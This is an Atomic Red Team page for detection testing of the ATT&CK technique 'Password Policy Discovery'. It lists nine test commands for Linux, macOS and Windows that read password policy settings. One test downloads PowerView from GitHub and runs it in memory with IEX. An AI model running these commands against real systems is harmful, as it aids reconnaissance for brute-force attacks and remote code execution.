Try it using Invoke-Atomic

Password Policy Discovery

Description from ATT&CK

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l <username>, cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a Network Device CLI on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)

Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).

Atomic Tests

Atomic Test #1 - Examine password complexity policy - Ubuntu

Lists the password complexity policy to console on Ubuntu Linux.

Supported Platforms: linux

auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b

Inputs:

None

Attack Commands: Run with bash!

1
2
cat /etc/pam.d/common-password

Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x

Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.

Supported Platforms: linux

auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d

Inputs:

None

Attack Commands: Run with bash!

1
2
cat /etc/security/pwquality.conf

Dependencies: Run with bash!

Description: System must be CentOS or RHEL v7

Check Prereq Commands:

1
2
if [ $(uname -a | grep -ioP 'el[0-9]' | grep -oP '[0-9]') -eq "7" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
echo Please run from CentOS or RHEL v7

Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x

Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.

Supported Platforms: linux

auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358

Inputs:

None

Attack Commands: Run with bash!

1
2
3
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf

Dependencies: Run with bash!

Description: System must be CentOS or RHEL v6

Check Prereq Commands:

1
2
if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;

Get Prereq Commands:

1
2
echo Please run from CentOS or RHEL v6

Atomic Test #4 - Examine password expiration policy - All Linux

Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.

Supported Platforms: linux

auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a

Inputs:

None

Attack Commands: Run with bash!

1
2
cat /etc/login.defs

Atomic Test #5 - Examine local password policy - Windows

Lists the local password policy to console on Windows.

Supported Platforms: windows

auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
net accounts

Atomic Test #6 - Examine domain password policy - Windows

Lists the domain password policy to console on Windows.

Supported Platforms: windows

auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
net accounts /domain

Atomic Test #7 - Examine password policy - macOS

Lists the password policy to console on macOS.

Supported Platforms: macos

auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742

Inputs:

None

Attack Commands: Run with bash!

1
pwpolicy getaccountpolicies

Atomic Test #8 - Get-DomainPolicy with PowerView

Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.

Supported Platforms: windows

auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose

Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy

The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy. Upon successful execution a listing of the policy implemented will display. Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps

Supported Platforms: windows

auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb

Inputs:

None

Attack Commands: Run with powershell!

1
2
get-addefaultdomainpasswordpolicy

source